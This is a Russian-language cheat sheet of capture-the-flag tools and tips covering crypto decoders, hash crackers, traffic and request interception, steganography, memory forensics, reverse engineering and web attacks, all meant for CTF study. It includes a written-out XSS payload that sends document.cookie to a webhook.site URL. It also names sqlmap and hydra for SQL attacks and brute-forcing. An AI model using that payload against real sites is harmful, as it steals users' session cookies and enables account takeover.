РЕКОМЕНДУЮ СТАВИТЬ КАЛИ ЛИНУКС И ЗАРАНЕЕ СТАВИТЬ ВСЁ ИЗ ВАШЕЙ КАТЕГОРИИ
- quip quip
- решалка криптограм которая стремиться к минимальной энропии(старается организовать слова)
- cryptii
- многоуровневые шифрования/дешифрования
- b64/32/url/hash/file en/de/coder
- полезная штука
- dcode (france)
- расшифровка всего
- вбиваете в поиск шифр и оно откроет решалку данного шифра
- умеет решать даже судоку)
- crack station
- расшифровывает некоторые хеши
- богатая база хешей(радужная таблица) 15 gb
- hashes.com
- расшифровывает некоторые хеши
- Hash identifier
- wireshark
- в основном для загрузки pcap файлов содержащих кучу сетевых пакетов
- внимательно читайте задание и ищите то что говорят
- fiddler
- подмена ответов запросов
- burp suite
- подмена запросов и их отправка
- и много других неизученых мною фич
- Использовать webhook.site для возвратного получения данных(callback)
- <img src=x onerror=this.src='https://webhook.site/fad40d81-20a3-4ce9-9399-0c9a9a6e6a24/'+document.cookie;>
- В примере выше я отправляю на вебхук куки в качестве открытия страницы с названием куки
- шпоры по sql и тд
- windscribe
- делаете аккаунт, затем в настройках аккаунта вводиться промокод "ПИЗДЕЦ" дает 30 гб
- cloudflare warp
- впн от cloudflare
- Восстановление удаленных файлов
- Контейнеры
- Veracrypt, Truecrypt
- exiftool {имя_исполнительного_файла}
- ищет метаданные
- Binwalk
- поиск исполняемых и других файлов в картинке
- grep -i "flag{"
- поиск флага в прямую
- dir binary search
- в прямую ищет байты в директории рекурсивно
- tineye
- поиск по картинке
- imagemagick
- манипуляция картинками
- stegsolve.jar
- часто решает задачу сразу
- steghide
- чтобы скачать нужен ВПН
- steghide --extract -sf {имя_файла}
- попытка найти что-либо в файле
- pngcheck
- проверка на целостность картинки
- zsteg
- поиск чего либо в PNG, BMP
- smart deblur
- убирает размывание с фотографии
- stegseek
- перебирает все пароли
- kali
- https://futureboy.us/stegano/decinput.html
- http://stylesuxx.github.io/steganography/
- https://www.mobilefish.com/services/steganography/steganography.php
- https://manytools.org/hacker-tools/steganography-encode-text-into-image/
- https://steganosaur.us/dissertation/tools/image
- https://georgeom.net/StegOnline
- Дампы памяти (.mem файлы)
- HxD Hex Editor
- редактор сырых данных
- Volatility
- инструмент поиска и анализа инфы (ТОП)
- Foremost
- поиск файлов из дампа
- HxD Hex Editor
- file {имя_исполнительного_файла}
- даёт информацию о расширении, подписи и формате
- иногда организаторы могут дать бинарник, который окажется другим файлом, например картинкой
- strings -a {имя_исполнительного_файла}
- ищет все строки в исп. фале
- base64
- в интернете куча декодеров для этого шифра
- часто используется
- Ida Decompiler
- визуализация кода в виде графа
- Assembler Reference
- это сайт с инструкциями в ассемблере и их значениями в шестнадцатеричной системе счисления.
- GDB Documentation
- мануал по gdb
- Radare2
- красивый gdb
- BenEater
- ютубер, объясняет ассемблер
- snyk-cli
- имбище(must have)
- Ищет уязвимости в определенной папке.
- Для тех заданий, где предоставлены исходники.
- Даже если цель задания в другом, сканируйте код всё равно, может быть обходной путь.
- sqlmap
- Взлом sql и поиск уязвимостей в sql базе
- thc-hydra
- Bruteforce универсальный - thc-hydra
- Github
- Math.random() JS
- взлом псевдо рандома в js
- wappalayzer
- получения технологий которые использует сайт
Картинка
- Insecure Deserialization Attack
- атака на десиариазацию(восстановление обьектов из файла)
- HTTP pollution
- подмена параметров
- XSS guide
- полный разбор XXS(инъекция скрипта вместо текста)
- Cross-Site Request Forgery
- получение куки через подмен получателя куки
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent